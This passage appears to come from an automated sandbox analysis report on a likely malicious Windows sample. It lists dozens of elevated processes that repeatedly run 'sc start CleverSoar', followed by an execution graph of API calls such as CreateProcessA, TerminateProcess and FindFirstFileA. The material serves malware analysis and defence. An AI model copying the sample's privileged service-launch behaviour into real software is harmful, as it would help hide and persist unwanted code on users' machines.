                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:83
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:84
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:85
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:86
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:87
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:88
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:89
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:90
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:91
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:92
                                                        Start time:01:50:58
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:93
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:94
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:95
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:96
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:97
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:98
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:99
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:100
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:101
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:102
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:103
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:104
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:105
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:106
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:107
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:108
                                                        Start time:01:50:59
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2.4%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:15.5%
                                                          Total number of Nodes:792
                                                          Total number of Limit Nodes:13
                                                          execution_graph 66048 6bf54a27 66049 6bf54a5d _strlen 66048->66049 66050 6bf6639e 66049->66050 66051 6bf55b6f 66049->66051 66052 6bf55b58 66049->66052 66056 6bf55b09 _Yarn 66049->66056 66180 6c0d0130 18 API calls 2 library calls 66050->66180 66055 6c0c6a43 std::_Facet_Register 4 API calls 66051->66055 66166 6c0c6a43 66052->66166 66055->66056 66139 6c0baec0 66056->66139 66059 6bf55bad std::ios_base::_Ios_base_dtor 66059->66050 66062 6bf59ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66059->66062 66145 6c0c4ff0 CreateProcessA 66059->66145 66060 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66060->66062 66061 6c0baec0 2 API calls 66061->66062 66062->66050 66062->66060 66062->66061 66063 6bf5a292 Sleep 66062->66063 66078 6bf5e619 66062->66078 66072 6bf59bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 66063->66072 66064 6bf56624 66067 6c0c6a43 std::_Facet_Register 4 API calls 66064->66067 66065 6bf5660d 66066 6c0c6a43 std::_Facet_Register 4 API calls 66065->66066 66074 6bf565bc _Yarn _strlen 66066->66074 66067->66074 66068 6bf561cb _strlen 66068->66050 66068->66064 66068->66065 66068->66074 66069 6c0c4ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 66069->66072 66070 6bf663b2 66181 6bf415e0 18 API calls std::ios_base::_Ios_base_dtor 66070->66181 66071 6bf59bbd GetCurrentProcess TerminateProcess 66071->66062 66072->66050 66072->66062 66072->66069 66072->66070 66072->66071 66090 6c0c5960 104 API calls 66072->66090 66115 6c0c6a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66072->66115 66074->66070 66076 6bf56970 66074->66076 66077 6bf56989 66074->66077 66081 6bf56920 _Yarn 66074->66081 66075 6bf664f8 66079 6c0c6a43 std::_Facet_Register 4 API calls 66076->66079 66080 6c0c6a43 std::_Facet_Register 4 API calls 66077->66080 66083 6bf5f243 CreateFileA 66078->66083 66079->66081 66080->66081 66149 6c0c5960 66081->66149 66098 6bf5f2a7 66083->66098 66084 6bf569d6 std::ios_base::_Ios_base_dtor _strlen 66084->66050 66085 6bf56dd2 66084->66085 66086 6bf56dbb 66084->66086 66095 6bf56d69 _Yarn _strlen 66084->66095 66088 6c0c6a43 std::_Facet_Register 4 API calls 66085->66088 66087 6c0c6a43 std::_Facet_Register 4 API calls 66086->66087 66087->66095 66088->66095 66089 6bf602ca 66090->66072 66091 6bf57427 66093 6c0c6a43 std::_Facet_Register 4 API calls 66091->66093 66092 6bf57440 66094 6c0c6a43 std::_Facet_Register 4 API calls 66092->66094 66096 6bf573da _Yarn 66093->66096 66094->66096 66095->66070 66095->66091 66095->66092 66095->66096 66097 6c0c5960 104 API calls 66096->66097 66100 6bf5748d std::ios_base::_Ios_base_dtor _strlen 66097->66100 66098->66089 66099 6bf602ac GetCurrentProcess TerminateProcess 66098->66099 66099->66089 66100->66050 66101 6bf57991 66100->66101 66102 6bf579a8 66100->66102 66109 6bf57940 _Yarn _strlen 66100->66109 66103 6c0c6a43 std::_Facet_Register 4 API calls 66101->66103 66104 6c0c6a43 std::_Facet_Register 4 API calls 66102->66104 66103->66109 66104->66109 66105 6bf57de2 66108 6c0c6a43 std::_Facet_Register 4 API calls 66105->66108 66106 6bf57dc9 66107 6c0c6a43 std::_Facet_Register 4 API calls 66106->66107 66110 6bf57d7c _Yarn 66107->66110 66108->66110 66109->66070 66109->66105 66109->66106 66109->66110 66111 6c0c5960 104 API calls 66110->66111 66112 6bf57e2f std::ios_base::_Ios_base_dtor _strlen 66111->66112 66112->66050 66113 6bf585bf 66112->66113 66114 6bf585a8 66112->66114 66123 6bf58556 _Yarn _strlen 66112->66123 66117 6c0c6a43 std::_Facet_Register 4 API calls 66113->66117 66116 6c0c6a43 std::_Facet_Register 4 API calls 66114->66116 66115->66072 66116->66123 66117->66123 66118 6bf58983 66121 6c0c6a43 std::_Facet_Register 4 API calls 66118->66121 66119 6bf5896a 66120 6c0c6a43 std::_Facet_Register 4 API calls 66119->66120 66122 6bf5891d _Yarn 66120->66122 66121->66122 66124 6c0c5960 104 API calls 66122->66124 66123->66070 66123->66118 66123->66119 66123->66122 66125 6bf589d0 std::ios_base::_Ios_base_dtor _strlen 66124->66125 66125->66050 66126 6bf58f36 66125->66126 66127 6bf58f1f 66125->66127 66130 6bf58ecd _Yarn _strlen 66125->66130 66129 6c0c6a43 std::_Facet_Register 4 API calls 66126->66129 66128 6c0c6a43 std::_Facet_Register 4 API calls 66127->66128 66128->66130 66129->66130 66130->66070 66131 6bf59354 66130->66131 66132 6bf5936d 66130->66132 66135 6bf59307 _Yarn 66130->66135 66133 6c0c6a43 std::_Facet_Register 4 API calls 66131->66133 66134 6c0c6a43 std::_Facet_Register 4 API calls 66132->66134 66133->66135 66134->66135 66136 6c0c5960 104 API calls 66135->66136 66138 6bf593ba std::ios_base::_Ios_base_dtor 66136->66138 66137 6c0c4ff0 4 API calls 66137->66062 66138->66050 66138->66137 66140 6c0baed6 FindFirstFileA 66139->66140 66141 6c0baed4 66139->66141 66142 6c0baf10 66140->66142 66141->66140 66143 6c0baf14 FindClose 66142->66143 66144 6c0baf72 66142->66144 66143->66142 66144->66059 66146 6c0c50ca 66145->66146 66147 6c0c5080 WaitForSingleObject CloseHandle CloseHandle 66146->66147 66148 6c0c50e3 66146->66148 66147->66146 66148->66068 66150 6c0c59b7 66149->66150 66182 6c0c5ff0 66150->66182 66152 6c0c59c8 66201 6bf66ba0 66152->66201 66154 6c0c59ec 66159 6c0c5a54 66154->66159 66165 6c0c5a67 66154->66165 66220 6c0c6340 66154->66220 66228 6bfa2000 66154->66228 66156 6c0c5a9f std::ios_base::_Ios_base_dtor 66158 6bf8e010 67 API calls 66156->66158 66160 6c0c5ae2 std::ios_base::_Ios_base_dtor 66158->66160 66238 6c0c5b90 66159->66238 66160->66084 66163 6c0c5a5c 66259 6bf67090 66163->66259 66253 6bf8e010 66165->66253 66167 6c0c6a48 66166->66167 66168 6c0c6a62 66167->66168 66171 6c0c6a64 std::_Facet_Register 66167->66171 66718 6c0cf014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66167->66718 66168->66056 66170 6c0c78c3 std::_Facet_Register 66722 6c0c9379 RaiseException 66170->66722 66171->66170 66719 6c0c9379 RaiseException 66171->66719 66173 6c0c80bc IsProcessorFeaturePresent 66179 6c0c80e1 66173->66179 66175 6c0c7883 66720 6c0c9379 RaiseException 66175->66720 66177 6c0c78a3 std::invalid_argument::invalid_argument 66721 6c0c9379 RaiseException 66177->66721 66179->66056 66181->66075 66183 6c0c6025 66182->66183 66272 6bf92020 66183->66272 66185 6c0c60c6 66186 6c0c6a43 std::_Facet_Register 4 API calls 66185->66186 66187 6c0c60fe 66186->66187 66289 6c0c7327 66187->66289 66189 6c0c6112 66301 6bf91d90 66189->66301 66192 6c0c61ec 66192->66152 66194 6c0c6226 66309 6bf926e0 24 API calls 4 library calls 66194->66309 66196 6c0c6238 66310 6c0c9379 RaiseException 66196->66310 66198 6c0c624d 66199 6bf8e010 67 API calls 66198->66199 66200 6c0c625f 66199->66200 66200->66152 66202 6bf66bd5 66201->66202 66203 6bf92020 52 API calls 66202->66203 66204 6bf66c68 66203->66204 66205 6c0c6a43 std::_Facet_Register 4 API calls 66204->66205 66206 6bf66ca0 66205->66206 66207 6c0c7327 43 API calls 66206->66207 66208 6bf66cb4 66207->66208 66209 6bf91d90 89 API calls 66208->66209 66210 6bf66d5d 66209->66210 66211 6bf66d8e 66210->66211 66620 6bf92250 30 API calls 66210->66620 66211->66154 66213 6bf66dc8 66621 6bf926e0 24 API calls 4 library calls 66213->66621 66215 6bf66dda 66622 6c0c9379 RaiseException 66215->66622 66217 6bf66def 66218 6bf8e010 67 API calls 66217->66218 66219 6bf66e0f 66218->66219 66219->66154 66221 6c0c638d 66220->66221 66623 6c0c65a0 66221->66623 66223 6c0c647c 66223->66154 66226 6c0c63a5 66226->66223 66641 6bf92250 30 API calls 66226->66641 66642 6bf926e0 24 API calls 4 library calls 66226->66642 66643 6c0c9379 RaiseException 66226->66643 66229 6bfa203f 66228->66229 66235 6bfa2053 66229->66235 66652 6bf93560 32 API calls std::_Xinvalid_argument 66229->66652 66232 6bfa210e 66234 6bfa2121 66232->66234 66653 6bf937e0 32 API calls std::_Xinvalid_argument 66232->66653 66234->66154 66235->66232 66654 6bf92250 30 API calls 66235->66654 66655 6bf926e0 24 API calls 4 library calls 66235->66655 66656 6c0c9379 RaiseException 66235->66656 66239 6c0c5b9e 66238->66239 66240 6c0c5bd1 66238->66240 66657 6bf901f0 66239->66657 66241 6c0c5c83 66240->66241 66661 6bf92250 30 API calls 66240->66661 66241->66163 66245 6c0d0b18 67 API calls 66245->66240 66246 6c0c5cae 66662 6bf92340 24 API calls 66246->66662 66248 6c0c5cbe 66663 6c0c9379 RaiseException 66248->66663 66250 6c0c5cc9 66251 6bf8e010 67 API calls 66250->66251 66252 6c0c5d22 std::ios_base::_Ios_base_dtor 66251->66252 66252->66163 66254 6bf8e04b 66253->66254 66255 6bf8e0a3 66254->66255 66256 6bf901f0 64 API calls 66254->66256 66255->66156 66257 6bf8e098 66256->66257 66258 6c0d0b18 67 API calls 66257->66258 66258->66255 66260 6bf6709e 66259->66260 66261 6bf670d1 66259->66261 66262 6bf901f0 64 API calls 66260->66262 66263 6bf67183 66261->66263 66715 6bf92250 30 API calls 66261->66715 66264 6bf670c4 66262->66264 66263->66165 66265 6c0d0b18 67 API calls 66264->66265 66265->66261 66267 6bf671ae 66716 6bf92340 24 API calls 66267->66716 66269 6bf671be 66717 6c0c9379 RaiseException 66269->66717 66271 6bf671c9 66273 6c0c6a43 std::_Facet_Register 4 API calls 66272->66273 66274 6bf9207e 66273->66274 66275 6c0c7327 43 API calls 66274->66275 66276 6bf92092 66275->66276 66311 6bf92f60 42 API calls 4 library calls 66276->66311 66278 6bf920c8 66279 6bf9210d 66278->66279 66280 6bf92136 66278->66280 66281 6bf92120 66279->66281 66312 6c0c6f8e 9 API calls 2 library calls 66279->66312 66313 6bf92250 30 API calls 66280->66313 66281->66185 66284 6bf9215b 66314 6bf92340 24 API calls 66284->66314 66286 6bf92171 66315 6c0c9379 RaiseException 66286->66315 66288 6bf9217c 66288->66185 66290 6c0c7333 __EH_prolog3 66289->66290 66316 6c0c6eb5 66290->66316 66295 6c0c7351 66330 6c0c73ba 39 API calls std::locale::_Setgloballocale 66295->66330 66296 6c0c736f 66322 6c0c6ee6 66296->66322 66297 6c0c73ac 66297->66189 66299 6c0c7359 66331 6c0c71b1 HeapFree GetLastError _Yarn 66299->66331 66302 6bf91ddc 66301->66302 66303 6bf91dc7 66301->66303 66336 6c0c7447 66302->66336 66303->66192 66308 6bf92250 30 API calls 66303->66308 66307 6bf91e82 66308->66194 66309->66196 66310->66198 66311->66278 66312->66281 66313->66284 66314->66286 66315->66288 66317 6c0c6ec4 66316->66317 66319 6c0c6ecb 66316->66319 66332 6c0d03cd 6 API calls std::_Lockit::_Lockit 66317->66332 66320 6c0c6ec9 66319->66320 66333 6c0c858b EnterCriticalSection 66319->66333 66320->66296 66329 6c0c7230 6 API calls 2 library calls 66320->66329 66323 6c0d03db 66322->66323 66324 6c0c6ef0 66322->66324 66335 6c0d03b6 LeaveCriticalSection 66323->66335 66325 6c0c6f03 66324->66325 66334 6c0c8599 LeaveCriticalSection 66324->66334 66325->66297 66327 6c0d03e2 66327->66297 66329->66295 66330->66299 66331->66296 66332->66320 66333->66320 66334->66325 66335->66327 66337 6c0c7450 66336->66337 66343 6bf91dea 66337->66343 66345 6c0cfd4a 66337->66345 66339 6c0c749c 66339->66343 66356 6c0cfa58 65 API calls 66339->66356 66341 6c0c74b7 66341->66343 66357 6c0d0b18 66341->66357 66343->66303 66344 6c0cc563 18 API calls __fassign 66343->66344 66344->66307 66346 6c0cfd55 __wsopen_s 66345->66346 66347 6c0cfd68 66346->66347 66348 6c0cfd88 66346->66348 66382 6c0d0120 18 API calls __fassign 66347->66382 66352 6c0cfd78 66348->66352 66368 6c0dae0c 66348->66368 66352->66339 66356->66341 66358 6c0d0b24 __wsopen_s 66357->66358 66359 6c0d0b2e 66358->66359 66360 6c0d0b43 66358->66360 66506 6c0d0120 18 API calls __fassign 66359->66506 66365 6c0d0b3e 66360->66365 66491 6c0cc5a9 EnterCriticalSection 66360->66491 66363 6c0d0b60 66492 6c0d0b9c 66363->66492 66365->66343 66366 6c0d0b6b 66507 6c0d0b92 LeaveCriticalSection 66366->66507 66369 6c0dae18 __wsopen_s 66368->66369 66384 6c0d039f EnterCriticalSection 66369->66384 66371 6c0dae26 66385 6c0daeb0 66371->66385 66376 6c0daf72 66377 6c0db091 66376->66377 66409 6c0db114 66377->66409 66380 6c0cfdcc 66383 6c0cfdf5 LeaveCriticalSection 66380->66383 66382->66352 66383->66352 66384->66371 66392 6c0daed3 66385->66392 66386 6c0dae33 66399 6c0dae6c 66386->66399 66387 6c0daf2b 66404 6c0d71e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66387->66404 66389 6c0daf34 66405 6c0d47bb HeapFree GetLastError __dosmaperr 66389->66405 66392->66386 66392->66387 66402 6c0cc5a9 EnterCriticalSection 66392->66402 66403 6c0cc5bd LeaveCriticalSection 66392->66403 66393 6c0daf3d 66393->66386 66406 6c0d6c1f 6 API calls std::_Lockit::_Lockit 66393->66406 66395 6c0daf5c 66407 6c0cc5a9 EnterCriticalSection 66395->66407 66398 6c0daf6f 66398->66386 66408 6c0d03b6 LeaveCriticalSection 66399->66408 66401 6c0cfda3 66401->66352 66401->66376 66402->66392 66403->66392 66404->66389 66405->66393 66406->66395 66407->66398 66408->66401 66410 6c0db133 66409->66410 66411 6c0db146 66410->66411 66415 6c0db15b 66410->66415 66425 6c0d0120 18 API calls __fassign 66411->66425 66413 6c0db0a7 66413->66380 66422 6c0e3fde 66413->66422 66418 6c0db27b 66415->66418 66426 6c0e3ea8 37 API calls __fassign 66415->66426 66417 6c0db2cb 66417->66418 66427 6c0e3ea8 37 API calls __fassign 66417->66427 66418->66413 66429 6c0d0120 18 API calls __fassign 66418->66429 66420 6c0db2e9 66420->66418 66428 6c0e3ea8 37 API calls __fassign 66420->66428 66430 6c0e4396 66422->66430 66425->66413 66426->66417 66427->66420 66428->66418 66429->66413 66431 6c0e43a2 __wsopen_s 66430->66431 66432 6c0e43a9 66431->66432 66433 6c0e43d4 66431->66433 66448 6c0d0120 18 API calls __fassign 66432->66448 66439 6c0e3ffe 66433->66439 66438 6c0e3ff9 66438->66380 66450 6c0d06cb 66439->66450 66445 6c0e4066 66449 6c0e442b LeaveCriticalSection __wsopen_s 66445->66449 66446 6c0e4034 66446->66445 66490 6c0d47bb HeapFree GetLastError __dosmaperr 66446->66490 66448->66438 66449->66438 66451 6c0cbceb __fassign 37 API calls 66450->66451 66452 6c0d06dd 66451->66452 66453 6c0d06ef 66452->66453 66454 6c0d69d5 __wsopen_s 5 API calls 66452->66454 66455 6c0cbdf6 66453->66455 66454->66453 66456 6c0cbe4e __wsopen_s GetLastError HeapFree GetLastError MultiByteToWideChar 66455->66456 66457 6c0cbe0e 66456->66457 66457->66446 66458 6c0e406c 66457->66458 66459 6c0e44ec __wsopen_s 18 API calls 66458->66459 66460 6c0e4089 66459->66460 66461 6c0e409e __dosmaperr 66460->66461 66462 6c0e160c __wsopen_s 14 API calls 66460->66462 66461->66446 66463 6c0e40bc 66462->66463 66463->66461 66464 6c0e4457 __wsopen_s CreateFileW 66463->66464 66469 6c0e4115 66464->66469 66465 6c0e4192 GetFileType 66466 6c0e419d GetLastError 66465->66466 66467 6c0e41e4 66465->66467 66470 6c0cf9f2 __dosmaperr 66466->66470 66473 6c0e17b0 __wsopen_s SetStdHandle 66467->66473 66468 6c0e4167 GetLastError 66468->66461 66469->66465 66469->66468 66472 6c0e4457 __wsopen_s CreateFileW 66469->66472 66471 6c0e41ab CloseHandle 66470->66471 66471->66461 66486 6c0e41d4 66471->66486 66474 6c0e415a 66472->66474 66475 6c0e4205 66473->66475 66474->66465 66474->66468 66476 6c0e4251 66475->66476 66477 6c0e4666 __wsopen_s 70 API calls 66475->66477 66478 6c0e4710 __wsopen_s 70 API calls 66476->66478 66480 6c0e4258 66476->66480 66477->66476 66479 6c0e4286 66478->66479 66479->66480 66481 6c0e4294 66479->66481 66482 6c0db925 __wsopen_s 21 API calls 66480->66482 66481->66461 66483 6c0e4310 CloseHandle 66481->66483 66482->66461 66484 6c0e4457 __wsopen_s CreateFileW 66483->66484 66485 6c0e433b 66484->66485 66485->66486 66487 6c0e4345 GetLastError 66485->66487 66486->66461 66488 6c0e4351 __dosmaperr 66487->66488 66489 6c0e171f __wsopen_s 